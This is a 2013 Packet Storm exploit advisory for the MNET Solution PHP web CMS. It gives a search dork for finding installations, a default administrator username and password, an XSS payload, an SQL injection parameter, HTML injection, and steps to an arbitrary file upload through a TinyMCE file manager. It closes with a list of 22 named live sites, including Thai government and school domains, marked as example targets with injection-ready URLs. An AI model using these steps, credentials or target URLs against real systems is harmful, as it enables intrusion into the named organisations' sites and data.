MNET Solution XSS / SQL Injection / File Upload

2013-10-19T00:00:00
ID PACKETSTORM:123694
Type packetstorm
Reporter DevilScreaM
Modified 2013-10-19T00:00:00

Description

                                        
                                            `#Title : MNET Solution Multiple Vulnerabilities  
  
#Author : DevilScreaM  
  
#Date : 10/19/2013  
  
#Category : Web Applications  
  
#Type : PHP  
  
#Vendor : http://mnet.co.th  
  
#Greetz : 0day-id.com | newbie-security.or.id | Borneo Security | Indonesian Security  
Indonesian Hacker | Indonesian Exploiter | Indonesian Cyber  
  
#Thanks : ShadoWNamE | gruberr0r | Win32Conficker | Rec0ded |  
  
#Vulnerabillity : XSS, SQL Injection, HTML Injection, Arbitrary File Upload  
  
#Dork : inurl:webboard.php?option=answers  
  
  
Default Admin Password  
  
http://site-target/siteadmin/  
  
Username : superadmin  
Password : jocho  
  
====================================================================================================  
  
Cross Site Scripting  
  
http://site-target/[PATH]/subindex.php?page=search&kword=[XSS]  
  
Example at Web Vendor  
  
http://mnet.co.th/2012/th/main/subindex.php?page=search&kword=<script>alert('DevilScreaM')</script>  
  
====================================================================================================  
  
SQL Injection Vulnerability  
  
Vulnerable at 'webboard.php'  
  
http://site-target/[PATH]/webboard.php?option=answers&qNo=[SQLI]  
  
====================================================================================================  
  
HTML Injection  
  
Register to WebBoard, after Register, Create New Post  
  
Go to http://site-target/[PATH]/webboard.php?#post  
  
  
#NOTE  
  
Register Page : http://site-target/subindex.php?page=member&task=new  
  
  
====================================================================================================  
  
Arbitrary File Upload  
  
1. Login to Page Admin  
  
2. After Login, go to http://site-target/editor/tinymce/jscripts/tiny_mce/plugins/ajaxfilemanager/ajaxfilemanager.php  
  
3. Click Upload, And Upload Your HTML  
  
4. Result Upload at  
  
http://site-target/upfile/[YOURFILE].html  
  
http://site-target/images/[YOURFILE].html  
  
======================================================================================================  
  
Example Target  
  
http://tarbiah.ac.th/main/webboard.php?option=answers&qNo=20'  
http://pasayyawo.go.th/main/webboard.php?option=answers&qNo=9'  
http://anwarulislam.ac.th/main/webboard.php?option=answers&qNo=10'  
http://pujud.go.th/main/webboard.php?option=answers&qNo=20'  
http://npm.ac.th/en/webboard.php?option=answers&qNo=3'  
http://klongchanak.go.th/2011/main/webboard.php?option=answers&qNo=20'  
http://alfatihah.ac.th/main/webboard.php?option=answers&qNo=20'  
http://halal.or.th/th/main/webboard.php?option=answers&qNo=20'  
http://kpgt.co.th/en/main/webboard.php?option=answers&qNo=20'  
http://startec.co.th/main/webboard.php?option=answers&qNo=13'  
http://worldwidestudy.co.th/main/webboard.php?option=answers&qNo=4'  
http://mrhalalfood.co.th/th/main/webboard.php?option=answers&qNo=1'  
http://royalthaitour.com/ar/main/webboard.php?option=answers&qNo=2'  
http://prosperfilms.com/en/main/webboard.php?option=answers&qNo=8'  
http://halalscience.org/en/main/webboard.php?option=answers&qNo=2'  
http://satelliteguidemag.com/main/webboard.php?option=answers&qNo=13'  
http://jintakanitlanna.com/main/webboard.php?option=answers&qNo=63'  
http://muslimchonburi.com/2011/main/webboard.php?option=answers&qNo=23'  
http://fulfilacademy.com/main/webboard.php?option=answers&qNo=43'  
http://st-arabian.com/main/webboard.php?option=answers&qNo=43'  
http://thaipaki.com/main/webboard.php?option=answers&qNo=47'  
http://ben-socks.com/th/main/webboard.php?option=answers&qNo=23'  
`